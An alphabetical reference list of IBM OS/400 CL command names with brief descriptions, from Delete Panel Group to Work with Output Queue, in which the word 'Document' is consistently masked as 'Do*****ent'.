DLTPNLGRP Delete Panel Group
DLTPRB Delete Problem
DLTPSFCFG Delete PSF Configuration
DLTPTF Delete Program Temporary Fix
DLTQMFORM Delete Query Management Form
DLTQMQRY Delete Query Management Query
DLTQRY Delete Query
DLTQST Delete Questions and Answers
DLTQSTDB Delete Q/A Database
DLTRJECFG Delete RJE Configuration
DLTSBSD Delete Subsystem Description
DLTSCHIDX Delete Search Index
DLTSHF Delete Bookshelf
DLTSPADCT Delete Spelling Aid Dictionary
DLTSPLF Delete Spooled File
DLTSQLPKG Delete SQL Package
DLTSRVPGM Delete Service Program
DLTSSND Delete Session Description
DLTTAPCGY Delete Tape Category
DLTTBL Delete Table
DLTUDFS Delete User-Defined FS
DLTUSRIDX Delete User Index
DLTUSRPRF Delete User Profile
DLTUSRQ Delete User Queue
DLTUSRSPC Delete User Space
DLTVLDL Delete Validation List
DLTWSCST Delete WSCST
DLYJOB Delay Job
DMPCLPGM Dump CL Program
DMPDLO Dump Do*****ent Library Object
DMPJOB Dump Job
DMPJOBINT Dump Job Internal
DMPOBJ Dump Object
DMPSYSOBJ Dump System Object
DMPTAP Dump Tape
DMPTRC Dump Trace
DO Do Group
DSCJOB Disconnect Job
DSPACC Display Access Code
DSPACCAUT Display Access Code Authority
DSPACCGRP Display Access Group
DSPACTPJ Display Active Prestart Jobs
DSPACTPRFL Display Active Profile List
DSPACTSCD Display Activation Schedule
DSPAPPNINF Display APPN Information
DSPAUDJRNE Display Audit Journal Entries
DSPAUT Display Authority
DSPAUTHLR Display Authority Holder
DSPAUTL Display Authorization List
DSPAUTLDLO Display Authorization List DLO
DSPAUTLOBJ Display Authorization List Obj
DSPAUTUSR Display Authorized Users
DSPBCKSTS Display Backup Status
DSPBCKUP Display Backup Options
DSPBCKUPL Display Backup List
DSPBKP Display Breakpoints
DSPBNDDIR Display Binding Directory
DSPCCTRTE Display Circuit Route
DSPCCTSRV Display Circuit Service
DSPCDEFNT Display Coded Font
DSPCFGL Display Configuration List
DSPCLS Display Class
DSPCMD Display Command
DSPCNNL Display Connection List
DSPCNNSTS Display Connection Status
DSPCOSD Display Class-of-Service Desc
DSPCPCST Display CHKPND Constraint
DSPCSI Display Comm Side Information
DSPCTLD Display Controller Description
DSPCURDIR Display Current Directory
DSPDBG Display Debug
DSPDBGWCH Display Debug Watch
DSPDBR Display Data Base Relations
DSPDDMF Display DDM File
DSPDEVD Display Device Description
DSPDIRE Display Directory Entries
DSPDKT Display Diskette
DSPDLOAUD Display DLO Auditing Level
DSPDLOAUT Display DLO Authority
DSPDLONAM Display DLO Name
DSPDOC Display Do*****ent
DSPDSTL Display Distribution List
DSPDSTLOG Display Distribution Log
DSPDSTSRV Display Distribution Services
DSPDTA Display Data
DSPDTAARA Display Data Area
DSPDTADCT Display Data Dictionary
DSPEDTD Display Edit Description
DSPEWCBCDE Display EWC Barcode Entry
DSPEWCM Display Wireless Ctl Member
DSPEWCPTCE Display EWC PTC Entry
DSPEWLM Display Wireless Line Member
DSPEXPSCD Display Expiration Schedule
DSPFD Display File Description
DSPFFD Display File Field Description
DSPFLR Display Folder
DSPFNTRSCA Display Font Resource Attr
DSPFNTTBL Display Font Table
DSPHDWRSC Display Hardware Resources
DSPHFS Display Hierarchical File Sys.
DSPHLPDOC Display Help Do*****ent
DSPHSTGPH Display Historical Graph
DSPHSTJS Display History using JS
DSPIPLA Display IPL Attributes
DSPIPXCCT Display IPX Circuit
DSPIPXD Display IPX Description
DSPJOB Display Job
DSPJOBD Display Job Description
DSPJOBJS Display Job using JS
DSPJOBLOG Display Job Log
DSPJOBTBL Display Job Tables
DSPJRN Display Journal
DSPJRNRCVA Display Journal Receiver Atr
DSPKBDMAP Display Keyboard Map
DSPLANADPP Display LAN Adapter Profile
DSPLANMLB Display LAN Media Library
DSPLANSTS Display LAN Status
DSPLIB Display Library
DSPLIBD Display Library Description
DSPLIBL Display Library List
DSPLICKEY Display License Key Info
DSPLIND Display Line Description
DSPLNK Display Object Links
DSPLOG Display Log
DSPM36 Display Machine
DSPM36CFG Display Machine Configuration
DSPMFSINF Display Mounted FS Information
DSPMNUA Display Menu Attributes
DSPMOD Display Module
DSPMODD Display Mode Description
DSPMODSRC Display Module Source
DSPMODSTS Display Mode Status
DSPMSG Display Messages
DSPMSGD Display Message Description
DSPNCK Display Nickname
DSPNETA Display Network Attributes
DSPNODGRP Display Node Group
DSPNTBD Display NetBIOS Description
DSPNWID Display Network Interface Desc
DSPNWSA Display NWS Attributes
DSPNWSALS Display Network Server Alias
DSPNWSD Display Network Server Desc
DSPNWSSSN Display Network Server Session
DSPNWSSTC Display NWS Statistics
DSPNWSSTG Display NWS Storage Space
DSPNWSUSR Display Network Server Users
DSPNWSUSRA Display NWS User Attributes
DSPOBJAUT Display Object Authority
DSPOBJD Display Object Description
DSPOPCLNK Display OptiConnect Link Sts
DSPOPT Display Optical
DSPOPTLCK Display Optical Locks
DSPOPTSVR Display Optical Server
DSPOVR Display Override
DSPPDGPRF Display PDG Profile
DSPPFM Display Physical File Member
DSPPFRDTA Display Performance Data
DSPPFRGPH Display Performance Graph
DSPPGM Display Program
DSPPGMADP Display Program Adopt
DSPPGMREF Display Program References
DSPPGMVAR Display Program Variable
DSPPRB Display Problems
DSPPSFCFG Display PSF Configuration
DSPPTF Display Program Temporary Fix
DSPPWRSCD Display Power On/Off Schedule
DSPRCDLCK Display Record Locks
DSPRCYAP Dsp Recovery for Access Paths
DSPRDBDIRE Display RDB Directory Entries
DSPRJECFG Display RJE Configuration
DSPRMTDFN Display Remote Definition
DSPS36 Display S/36 Configuration
DSPSAVF Display Save File
DSPSBSD Display Subsystem Description
DSPSECA Display Security Attributes
DSPSECAUD Display Security Auditing
DSPSFWRSC Display Software Resources
DSPSOCSTS Display Sphere of Control Sts
DSPSPLF Display Spooled File
DSPSRVA Display Service Attributes
DSPSRVPGM Display Service Program
DSPSRVSTS Display Service Status
DSPSYSSTS Display System Status
DSPSYSVAL Display System Value
DSPTAP Display Tape
DSPTAPCGY Display Tape Category
DSPTAPCTG Display Tape Cartridge
DSPTAPSTS Display Tape Status
DSPTM Display Trademarks
DSPTRC Display Trace
DSPTRCDTA Display Trace Data
DSPUDFS Display User-Defined FS
DSPUPGPRP Display Upgrade Preparation
DSPUSRPMN Display User Permission
DSPUSRPRF Display User Profile
DSPUSRPRTI Display User Print Info
DSPVT1MAP Display VT100 keyboard map
DSPVTMAP Display VT Keyboard Map
DSPWSUSR Display Work Station User
DUPDKT Duplicate Diskette
DUPOPT Duplicate Optical
DUPTAP Duplicate Tape
EDTAUTL Edit Authorization List
EDTBCKUPL Edit Backup List
EDTCPCST Edit CHKPND Constraints
EDTDLOAUT Edit DLO Authority
EDTDOC Edit Do*****ent
EDTLIBL Edit Library List
EDTOBJAUT Edit Object Authority
EDTQST Edit Questions and Answers
EDTRBDAP Edit Rebuild of Access Paths
EDTRCYAP Edit Recovery for Access Path
EDTS36PGMA Edit S/36 Program Attributes
EDTS36PRCA Edit S/36 Procedure Attribute
EDTS36SRCA Edit S/36 Source Attributes
EDTWSOAUT Edit Workstation Object Aut
EJTEMLOUT Eject Emulation Output
ELEM Element Definition
ELSE Else
EMLPRTKEY Emulate Printer Keys
ENDBCHJOB End Batch Job
ENDCBLDBG End COBOL Debug
ENDCLNUP End Cleanup
ENDCMNSVR End Communications Server
ENDCMNTRC End Communications Trace
ENDCMTCTL End Commitment Control
ENDCPYSCN End Copy Screen
ENDCTLRCY End Controller Recovery
ENDDBG End Debug Mode
ENDDBGSVR End Debug Server
ENDDBMON End Database Monitor
ENDDEVRCY End Device Recovery
ENDDIRSHD End Directory Shadowing
ENDDO End Do Group
ENDEPMENV End EPM Environments
ENDGRPJOB End Group Job
ENDHOSTSVR End Host Server
ENDINP End Input
ENDIPIIFC End IP over IPX Interface
ENDIPSIFC End IP over SNA Interface
ENDIPX End IPX
ENDIPXCCT End IPX Circuit
ENDISDB End ISDB
ENDJOB End Job
ENDJOBABN End Job Abnormal
ENDJOBTRC End Job Trace
ENDJRNAP End Journal Access Path
ENDJRNPF End Journaling PF Changes
ENDJS End Job Scheduler
ENDLINRCY End Line Recovery
ENDM36 End Machine
ENDMOD End Mode
ENDMSF End Mail Server Framework
ENDNFSSVR End NFS Server
ENDNWIRCY End Network Interface Recovery
ENDNWSAPP End Network Server Application
ENDPASTHR End Pass-Through
ENDPEX End Performance Explorer
ENDPFRCOL End Performance Collection
ENDPFRMON End Performance Monitor
ENDPGM End Program
ENDPGMEXP End Program Export List
ENDPJ End Prestarted Jobs
ENDPRTEML End Printer Emulation
ENDRCV End Receive
ENDRDBRQS End relational database request
ENDRDR End Reader
ENDRJESSN End RJE Session
ENDRMTSPT End Remote Support
ENDRQS End Request
ENDS36 End S/36 Session
ENDSBS End Subsystem
ENDSRVJOB End Service Job
ENDSYS End System
ENDTCP End TCP/IP
ENDTCPCNN End TCP/IP Connection
ENDTCPIFC End TCP/IP Interface
ENDTCPLNK End TCP/IP Link
ENDTCPPTP End Point-to-Point TCP/IP
ENDTCPSVR End TCP/IP Server
ENDTIESSN End TIE Session
ENDTRPMGR End Trap Manager
ENDWTR End Writer
EOF End of File
ERASE Remove Link
EXPORT Export a Program Symbol
EXPORTFS Change NFS Export
EXTPGMINF Extract Program Information
FILDOC File Do*****ent
FMTDTA Format Data
FNDSTRPART Find String in Parts with PDM
FNDSTRPDM Find String Using PDM
FTP Start TCP/IP File Transfer
GENCAT Generate Message Catalog
GENS36RPT Generate S/36 Report
GENS38RPT Generate S/38 Report
GO Go to Menu
GOTO Go To
GRTACCAUT Grant Access Code Authority
GRTOBJAUT Grant Object Authority
GRTUSRAUT Grant User Authority
GRTUSRPMN Grant User Permission
GRTWSOAUT Grant Workstation Object Aut
HLDCMNDEV Hold Communications Device
HLDDSTQ Hold Distribution Queue
HLDJOB Hold Job
HLDJOBQ Hold Job Queue
HLDJOBSCDE Hold Job Schedule Entry
HLDOUTQ Hold Output Queue
HLDRDR Hold Reader
HLDSPLF Hold Spooled File
HLDWTR Hold Writer
IF If
INSNWSAPP Install Network Server App
INSPTF Install Program Temporary Fix
INZDKT Initialize Diskette
INZDSTQ Initialize Distribution Queue
INZOPT Initialize Optical
INZPCS Initialize Client Access/400
INZPFM Initialize Physical File Mbr
INZSYS Initialize System
INZTAP Initialize Tape
IPXPING Verify IPX Connection
LNKDTADFN Link/Unlink Data Definition
LODPTF Load Program Temporary Fix
LODQSTDB Load Q/A Database
LODRUN Load and Run
LPR Send TCP/IP Spooled File
MD Create Directory
MDLSYS Model System
MGRS36 Complete System/36 Migration
MGRS36APF System/36 APF Migration
MGRS36CBL System/36 Cobol Migration
MGRS36DFU System/36 DFU Migration
MGRS36DSPF System/36 Display File Migrate
MGRS36ITM Migrate S/36 item
MGRS36LIB System/36 Library Migration
MGRS36MNU System/36 Menu Migration
MGRS36MSGF System/36 Message File Migrate
MGRS36QRY System/36 Query Migration
MGRS36RPG System/36 RPG II Migration
MGRS36SEC System/36 User ID Migration
MGRS38OBJ Migrate S/38 object
MIGRATE Migration Menu
MKDIR Create Directory
MONMSG Monitor Message
MOUNT Add Mounted FS
MOV Move Object
MOVDOC Move Do*****ent
MOVE Move Object
MOVOBJ Move Object
MRGFMRSPL Merge spool file with a form
MRGFORMD Merge Form Description
MRGMSGCLG Merge Message Catalog
MRGMSGF Merge Message File
MRGSRC Merge Source
MRGTCPHT Merge TCP/IP Host Table
NETSTAT Work with TCP/IP Network Sts
OPNDBF Open Data Base File
OPNQRYF Open Query File
OVRDBF Override with Data Base File
OVRDKTF Override with Diskette File
OVRDSPF Override with Display File
OVRICFDEVE Override ICF Pgm Device Entry
OVRICFF Override ICF File
OVRMSGF Override Message File
OVRPRTF Override with Printer File
OVRSAVF Override with Save File
OVRTAPF Override with Tape File
PARM Parameter Definition
PGM Program
PING Verify TCP/IP Connection
PMTCTL Prompt Control Definition
POSDBF Position Data Base File
PRTACTRPT Print Activity Report
PRTADPOBJ Print Adopting Objects
PRTAFPDTA Print AFP Data
PRTCMDUSG Print Command Usage
PRTCMNSEC Print Communications Security
PRTCMNTRC Print Communications Trace
PRTCPTRPT Print Component Report
PRTDEVADR Print Device Addresses
PRTDOC Print Do*****ent
PRTDSKINF Print Disk Information
PRTERRLOG Print Error Log
PRTINTDTA Print Internal Data
PRTIPSCFG Print IP over SNA
PRTJOBDAUT Print JOBD Authority
PRTJOBRPT Print Job Interval Report
PRTJOBTRC Print Job Trace
PRTLCKRPT Print Lock Report
PRTPEXRPT Print PEX Report
PRTPOLRPT Print Pool Report
PRTPUBAUT Print Publicly Auth Objects
PRTPVTAUT Print Private Authorities
PRTQAUT Print Queue Authority
PRTRSCRPT Print Resource Report
PRTSBSDAUT Print Subsystem Description
PRTSCDJS Print Schedule using JS
PRTSQLINF Print SQL Information
PRTSWL Print Stop Word List
PRTSYSINF Print System Information
PRTSYSRPT Print System Report
PRTSYSSECA Print System Security Attr
PRTTNSRPT Print Transaction Report
PRTTRCRPT Print Job Trace Report
PRTTRGPGM Print Trigger Programs
PRTUSROBJ Print User Objects
PRTUSRPRF Print User Profile
PWRDWNSYS Power Down System
QMUS36 System/36 Command Selection
QPZA000844 Send Distribution
QRYDOCLIB Query Do*****ent Library
QRYDST Query Distributions
QRYPRBSTS Query Problem Status
QRYTIEF Query TIE Files
QUAL Qualifier Definition
RCLACTGRP Reclaim Activation Group
RCLDDMCNV Reclaim DDM Conversations
RCLDLO Reclaim Do*****ent Lib Object
RCLLIB Reclaim Library
RCLOPT Reclaim Optical
RCLRSC Reclaim Resources
RCLSPLSTG Reclaim Spool Storage
RCLSTG Reclaim Storage
RCLTMPSTG Reclaim Temporary Storage
RCVDST Receive Distribution
RCVF Receive File
RCVJRNE Receive Journal Entry
RCVMGRDTA Receive Migration Data
RCVMSG Receive Message
RCVNETF Receive Network File
RCVTIEF Receive TIE File
RD Remove Directory
READFILE Read a File
REN Rename Object
RESMGRNAM no discription
RETURN Return
RGZDLO Reorganize Do*****ent Lib Object
RGZPFM Reorganize Physical File Mbr
RLSCMNDEV Release Communications Device
RLSDSTQ Release Distribution Queue
RLSIFSLCK Release File System Locks
RLSJOB Release Job
RLSJOBQ Release Job Queue
RLSJOBSCDE Release Job Schedule Entry
RLSOUTQ Release Output Queue
RLSRDR Release Reader
RLSRMTPHS Release Remote Phase
RLSSPLF Release Spooled File
RLSWTR Release Writer
RMDIR Remove Directory
RMVACC Remove Access Code
RMVAJE Remove Autostart Job Entry
RMVALRD Remove Alert Description
RMVAUTLE Remove Auth List Entry
RMVBKP Remove Breakpoint
RMVBNDDIRE Remove Binding Directory Entry
RMVCCTRTE Remove Circuit Route
RMVCCTSRV Remove Circuit Service
RMVCFGLE Remove Cfg List Entries
RMVCMNE Remove Communications Entry
RMVCNNLE Remove Connection List Entry
RMVCOMSNMP Remove Community for SNMP
RMVDIR Remove Directory
RMVDIRE Remove Directory Entry
RMVDIRSHD Remove Directory Shadow System
RMVDLOAUT Remove DLO Authority
RMVDSTLE Remove Distribution List Entry
RMVDSTQ Remove Distribution Queue
RMVDSTRTE Remove Distribution Route
RMVDSTSYSN Remove Secondary System Name
RMVEMLCFGE Remove Configuration Entry
RMVEWCBCDE Remove EWC Barcode Entry
RMVEWCPTCE Remove EWC PTC Entry
RMVEXITPGM Remove Exit Program
RMVFCTE Remove Forms Control Entry
RMVFTRACNE Remove Filter Action Entry
RMVFTRSLTE Remove Filter Selection Entry
RMVICFDEVE Remove ICF Device Entry
RMVIPIADR Remove IP over IPX Address
RMVIPIIFC Remove IP over IPX Interface
RMVIPIRTE Remove IP over IPX Route
RMVIPSIFC Remove IP over SNA Interface
RMVIPSLOC Remove IP over SNA Location
RMVIPSRTE Remove IP over SNA Route
RMVIPXCCT Remove IPX Circuit
RMVJOBQE Remove Job Queue Entry
RMVJOBSCDE Remove Job Schedule Entry
RMVJRNCHG Remove Journaled Changes
RMVLANADPI Remove LAN Adapter Information
RMVLANADPT Remove LAN Adapter
RMVLIBLE Remove Library List Entry
RMVLICKEY Remove License Key Information
RMVLNK Remove Link
RMVM Remove Member
RMVMFS Remove Mounted FS
RMVMSG Remove Message
RMVMSGD Remove Message Description
RMVNCK Remove Nickname
RMVNETJOBE Remove Network Job Entry
RMVNETTBLE Remove Network Table Entry
RMVNODLE Remove Node List Entry
RMVNWSSTGL Remove Server Storage Link
RMVOPTCTG Remove Optical Cartridge
RMVOPTSVR Remove Optical Server
RMVPCLTBLE Remove Protocol Table Entry
RMVPEXDFN Remove PEX Definition
RMVPFCST Remove PF Constraint
RMVPFTRG Remove Physical File Trigger
RMVPGM Remove Program
RMVPJE Remove Prestart Job Entry
RMVPTF Remove Program Temporary Fix
RMVRDBDIRE Remove RDB Directory Entry
RMVREXBUF Remove REXX Buffer
RMVRJECMNE Remove RJE Communication Entry
RMVRJERDRE Remove RJE Reader Entry
RMVRJEWTRE Remove RJE Writer Entry
RMVRMTDFN Remove Remote Definition
RMVRPYLE Remove Reply List Entry
RMVRTGE Remove Routing Entry
RMVSCHIDXE Remove Search Index Entry
RMVSNILOC Remove SNA over IPX Location
RMVSOCE Remove Sphere of Control Entry
RMVSRVTBLE Remove Service Table Entry
RMVTAPCTG Remove Tape Cartridge
RMVTCPHTE Remove TCP/IP Host Table Entry
RMVTCPIFC Remove TCP/IP Interface
RMVTCPLNK Remove TCP/IP Link
RMVTCPPORT Remove TCP/IP Port Restriction
RMVTCPRSI Remove TCP/IP Remote System
RMVTCPRTE Remove TCP/IP Route
RMVTRC Remove Trace
RMVWSE Remove Work Station Entry
RNM Rename Object
RNMCNNLE Rename Connection List Entry
RNMDIRE Rename Directory Entry
RNMDKT Rename Diskette
RNMDLO Rename Do*****ent Library Object
RNMDSTL Rename Distribution List
RNMLANADPI Rename LAN Adapter
RNMM Rename Member
RNMNCK Rename Nickname
RNMOBJ Rename Object
RNMTCPHTE Rename TCP/IP Host Table Entry
ROLLBACK Rollback
RPLDOC Replace Do*****ent
RQSORDAST Request Order Assistance
RRTJOB Reroute Job
RSMBKP Resume Breakpoint
RSMCTLRCY Resume Controller Recovery
RSMDEVRCY Resume Device Recovery
RSMLINRCY Resume Line Recovery
RSMNWIRCY Resume NWI Recovery
RST Restore Object
RSTAUT Restore Authority
RSTCFG Restore Configuration
RSTDLO Restore Do*****ent Lib Object
RSTLIB Restore Library
RSTLICPGM Restore Licensed Program
RSTOBJ Restore Object
RSTS36F Restore S/36 File
RSTS36FLR Restore S/36 Folder
RSTS36LIBM Restore S/36 Library Members
RSTS38AUT Restore S/38 Authorities
RSTSHF Restore Bookshelf
RSTUSRPRF Restore User Profiles
RTVAUTLE Retrieve Auth List Entry
RTVBCKUP Retrieve Backup Options
RTVBNDSRC Retrieve Binder Source
RTVCFGSRC Retrieve Configuration Source
RTVCFGSTS Retrieve Configuration Status
RTVCLDSRC Retrieve C Locale Description
RTVCLNUP Retrieve Cleanup
RTVCLSRC Retrieve CL Source
RTVCURDIR Retrieve Current Directory
RTVDLOAUT Retrieve DLO Authority
RTVDLONAM Retrieve DLO Name
RTVDOC Retrieve Do*****ent
RTVDSKINF Retrieve Disk Information
RTVDTAARA Retrieve Data Area
RTVGRPA Retrieve Group Attributes
RTVJOBA Retrieve Job Attributes
RTVJRNE Retrieve Journal Entry
RTVLIBD Retrieve Library Description
RTVMBRD Retrieve Member Description
RTVMSG Retrieve Message
RTVNETA Retrieve Network Attributes
RTVOBJD Retrieve Object Description
RTVPDGPRF Retrieve PDG Profile
RTVPWRSCDE Retrieve Power Schedule Entry
RTVQMFORM Retrieve Query Management Form
RTVQMQRY Retrieve Query Mgmt Query
RTVS36A Retrieve S/36 Environment Attr
RTVSWLSRC Retrieve Stop Word List Source
RTVSYSINF Retrieve System Information
RTVSYSVAL Retrieve System Value
RTVUSRPRF Retrieve User Profile
RTVUSRPRTI Retrieve User Print Info
RTVWSCST Retrieve WSCST source
RUNBCKUP Run Backup
RUNLPDA Run LPDA-2
RUNQRY Run Query
RUNRMTCMD Run Remote Command
RUNSQLSTM Run SQL Statements
RVKACCAUT Revoke Access Code Authority
RVKOBJAUT Revoke Object Authority
RVKPUBAUT Revoke Public Authority
RVKUSRPMN Revoke User Permission
RVKWSOAUT Revoke Workstation Object Aut
SAV Save Object
SAVAPARDTA Save APAR Data
SAVCFG Save Configuration
SAVCHGOBJ Save Changed Objects
SAVDLO Save Do*****ent Library Object
SAVEBRKMSG Send Break Message
SAVLIB Save Library
SAVLICPGM Save Licensed Program
SAVOBJ Save Object
SAVRST Save Restore
SAVRSTCHG Save Restore Changed Objects
SAVRSTDLO Save Restore Doc/Lib Object
SAVRSTLIB Save Restore Library
SAVRSTOBJ Save Restore Object
SAVS36F Save S/36 File
SAVS36LIBM Save S/36 Library Members
SAVSAVFDTA Save Save File Data
SAVSECDTA Save Security Data
SAVSHF Save Bookshelf
SAVSTG Save Storage
SAVSYS Save System
SBMCODEJOB Submit CODE Batch Job
SBMDBJOB Submit Data Base Jobs
SBMDKTJOB Submit Diskette Jobs
SBMFNCJOB Submit Finance Job
SBMJOB Submit Job
SBMNETJOB Submit Network Job
SBMNWSCMD Submit Network Server Command
SBMRJEJOB Submit RJE Job
SBMRMTCMD Submit Remote Command
SETATNPGM Set Attention Program
SETCSTDTA Set Customization Data
SETKBDMAP Set Keyboard Map
SETOBJACC Set Object Access
SETPGMINF Set Program Information
SETTAPCGY Set Tape Category
SETUPGENV Set Upgrade Environment
SETVT1MAP Set VT100 keyboard map
SETVTMAP Set VT Keyboard Map
SETVTTBL Set VT Mapping Tables
SIGNOFF Sign Off
SLTCMD Select Command
SNDDST Send Distribution
SNDDSTQ Send Distribution Queue
SNDF Send File
SNDFNCIMG Send Finance Diskette Image
SNDJRNE Send Journal Entry
SNDMGRDTA Send Migration Data
SNDMSG Send Message
SNDNETF Send Network File
SNDNETMSG Send Network Message
SNDNETSPLF Send Network Spooled File
SNDNWSMSG Send Network Server Message
SNDPGMMSG Send Program Message
SNDPTFORD Send PTF Order
SNDRCVF Send/Receive File
SNDRJECMD Send RJE Command
SNDRPY Send Reply
SNDSRVRQS Send Service Request
SNDTCPSPLF Send TCP/IP Spooled File
SNDTIEF Send TIE File
SNDUSRMSG Send User Message
STATFS Display Mounted FS Information
STRAPF Advanced Printer Function
STRBEST Start BEST/1
STRCBLDBG Start COBOL Debug
STRCLNUP Start Cleanup
STRCMNSVR Start Communications Server
STRCMNTRC Start Communications Trace
STRCMTCTL Start Commitment Control
STRCODE Start CODE
STRCPYSCN Start Copy Screen
STRDBG Start Debug
STRDBGSVR Start Debug Server
STRDBMON Start Database Monitor
STRDBRDR Start Data Base Reader
STRDFU Start DFU
STRDIRSHD Start Directory Shadowing
STRDKTRDR Start Diskette Reader
STRDKTWTR Start Diskette Writer
STREDU Start Education
STREML3270 Start 3270 Display Emulation
STREPMENV Start EPM Environment
STRHOSTSVR Start Host Server
STRIDD Start IDDU
STRINFSKR Start InfoSeeker
STRIPIIFC Start IP over IPX Interface
STRIPSIFC Start IP over SNA Interface
STRIPX Start IPX
STRIPXCCT Start IPX Circuit
STRISDB Start ISDB
STRITF Start ITF
STRJOBTRC Start Job Trace
STRJRNAP Start Journal Access Path
STRJRNPF Start Journal Physical File
STRMOD Start Mode
STRMSF Start Mail Server Framework
STRNFSSVR Start NFS Server
STRNWSAPP Start Network Server App
STROBJCVN Start Object Conversion
STRPASTHR Start Pass-Through
STRPCCMD Start PC Command
STRPCO Start PC Organizer
STRPDM Start PDM
STRPEX Start Performance Explorer
STRPFRCOL Start Performance Collection
STRPFRG Start Performance Graphics
STRPFRMON Start Performance Monitor
STRPFRT Start Performance Tools
STRPGMEXP Start Program Export List
STRPGMMNU Start Programmer Menu
STRPJ Start Prestarted Jobs
STRPRTEML Start Printer Emulation
STRPRTWTR Start Printer Writer
STRQM Start DB2 Query Manager OS/400
STRQMPRC Start Query Management Proc
STRQMQRY Start Query Management Query
STRQRY Start Query
STRQST Start Question and Answer
STRREXPRC Start REXX Procedure
STRRJECSL Start RJE Console
STRRJERDR Start RJE Reader
STRRJESSN Start RJE Session
STRRJEWTR Start RJE Writer
STRRLU Start Report Layout Utility
STRRMTSPT Start Remote Support
STRRMTWTR Start Remote Writer
STRS36 Start S/36 Session
STRS36MGR Start S/36 Migration
STRS36PRC Start S/36 Procedure
STRS38MGR Start S/38 Migration
STRSBS Start Subsystem
STRSCHIDX Start Search Index
STRSDA Start SDA
STRSEU Start Source Entry Utility
STRSPTN Start Support Network
STRSQL Start SQL Interactive Session
STRSRVJOB Start Service Job
STRSST Start System Service Tools
STRTCP Start TCP/IP
STRTCPFTP Start TCP/IP File Transfer
STRTCPIFC Start TCP/IP Interface
STRTCPLNK Start TCP/IP Link
STRTCPPTP Start Point-to-Point TCP/IP
STRTCPSVR Start TCP/IP Server
STRTCPTELN Start TCP/IP TELNET
STRTIESSN Start TIE Session
STRTRPMGR Start Trap Manager
TELNET Start TCP/IP TELNET
TFRBCHJOB Transfer Batch Job
TFRCTL Transfer Control
TFRGRPJOB Transfer to Group Job
TFRJOB Transfer Job
TFRPASTHR Transfer Pass-Through
TFRSECJOB Transfer Secondary Job
TRCCPIC Trace CPI Communications
TRCICF Trace ICF
TRCINT Trace Internal
TRCJOB Trace Job
TRCREX Trace REXX
UNMOUNT Remove Mounted FS
UPDDTA Update Data with Temp Program
UPDPGM Update Program
UPDSRVPGM Update Service Program
UPDSYSINF Update System Information
VFYAPPCCNN Verify APPC Connection
VFYCMN Verify Communications
VFYIPXCNN Verify IPX Connection
VFYLNKLPDA Verify Link supporting LPDA-2
VFYOPT Verify Optical
VFYPRT Verify Printer
VFYTAP Verify Tape
VFYTCPCNN Verify TCP/IP Connection
VRYCFG Vary Configuration
WAIT Wait
WRKACTJOB Work with Active Jobs
WRKALR Work with Alerts
WRKALRD Work with Alert Descriptions
WRKALRTBL Work with Alert Table
WRKAUT Work with Authority
WRKAUTL Work with Authorization Lists
WRKBNDDIR Work with Binding Directories
WRKBNDDIRE Work with Binding Dir Entries
WRKBPTBL Work with BOOTP table
WRKCCTRTE Work with Circuit Routes
WRKCCTSRV Work with Circuit Services
WRKCFGL Work with Configuration Lists
WRKCFGSTS Work with Configuration Status
WRKCHTFMT Work with Chart Formats
WRKCLS Work with Classes
WRKCMD Work with Commands
WRKCMTDFN Work with Commitment Def
WRKCNNL Work with Connection Lists
WRKCNNLE Work with CNNL Entries
WRKCNTINF Work with Contact Information
WRKCOSD Work with COS Descriptions
WRKCSI Work Comm Side Information
WRKCTLD Work with Ctl Descriptions
WRKDBFIDD Work with DB Files using IDDU
WRKDDMF Work with DDM Files
WRKDEVD Work with Device Descriptions
WRKDEVTBL Work with Device Tables
WRKDIRE Work with Directory Entries
WRKDIRLOC Work with Directory Locations
WRKDIRSHD Work with Dir Shadow Systems
WRKDOC Work with Do*****ents
WRKDOCLIB Work with Do*****ent Libraries
WRKDOCPRTQ Work with Do*****ent Print Queue
WRKDPCQ Work with DSNX/PC Queues
WRKDSKSTS Work with Disk Status
WRKDSTL Work with Distribution Lists
WRKDSTQ Work with Distribution Queue
WRKDTAARA Work with Data Areas
WRKDTADCT Work with Data Dictionaries
WRKDTADFN Work with Data Definitions
WRKDTAQ Work with Data Queues
WRKEDTD Work with Edit Descriptions
WRKENVVAR Work with Environment Var
WRKF Work with Files
WRKFCNARA Work with Functional Areas
WRKFCT Work with Forms Control Table
WRKFLR Work with Folders
WRKFNTRSC Work with Font Resources
WRKFORMDF Work with Form Definitions
WRKFTR Work with Filters
WRKFTRACNE Work with Ftr Action Entry
WRKFTRSLTE Work with Ftr Selection Entry
WRKGRPPDM Work with Groups Using PDM
WRKGSS Work with Graphics Symbol Sets
WRKHDWPRD Work with Hardware Products
WRKHDWRSC Work with Hardware Resources
WRKHLDOPTF Work with Held Optical Files
WRKHTTPCFG Work with HTTP Configuration
WRKIPXCCT Work with IPX Circuits
WRKIPXD Work with IPX Descriptions
WRKIPXSTS Work with IPX Status
WRKJOB Work with Job
WRKJOBD Work with Job Descriptions
WRKJOBQ Work with Job Queue
WRKJOBSCDE Work with Job Schedule Entries
WRKJRN Work with Journal
WRKJRNA Work with Journal Attributes
WRKJRNRCV Work with Journal Receivers
WRKLANADPT Work With LAN Adapters
WRKLIB Work with Libraries
WRKLIBPDM Work with Libraries Using PDM
WRKLICINF Work with License Information
WRKLIND Work with Line Descriptions
WRKLNK Work with Object Links
WRKM36 Work with Machines
WRKM36CFG Work with Machine Config
WRKMBRPDM Work with Members Using PDM
WRKMLBSTS Work with Media Library Status
WRKMNU Work with Menus
WRKMOD Work with Module
WRKMODD Work with Mode Descriptions
WRKMSG Work with Messages
WRKMSGD Work with Message Descriptions
WRKMSGF Work with Message Files
WRKMSGQ Work with Message Queues
WRKNAMSMTP Work with Names for SMTP
WRKNCK Work With Nickname
WRKNETF Work with Network Files
WRKNETJOBE Work with Network Job Entries
WRKNETTBLE Work with Network Table Entry
WRKNODL Work with Node List
WRKNODLE Work with Node List Entries
WRKNTBD Work with NetBIOS Descriptions
WRKNWID Work with Network Interfaces
WRKNWSALS Work with NWS Aliases
WRKNWSD Work with Network Servers
WRKNWSENR Work with NWS User Enrollment
WRKNWSSSN Work with NWS Sessions
WRKNWSSTG Work with NWS Storage Spaces
WRKNWSSTS Work with NWS Status
WRKOBJ Work with Objects
WRKOBJLCK Work with Object Locks
WRKOBJOWN Work with Objects by Owner
WRKOBJPDM Work with Objects Using PDM
WRKOBJPGP Work Objects by Primary Group
WRKOPCACT Work with OptiConnect Activity
WRKOPTDIR Work with Optical Directories
WRKOPTF Work with Optical Files
WRKOPTVOL Work with Optical Volumes
WRKORDINF Work with Order Information
WRKORDRQS Work with Order Requests
WRKOUTQ Work with Output Queue
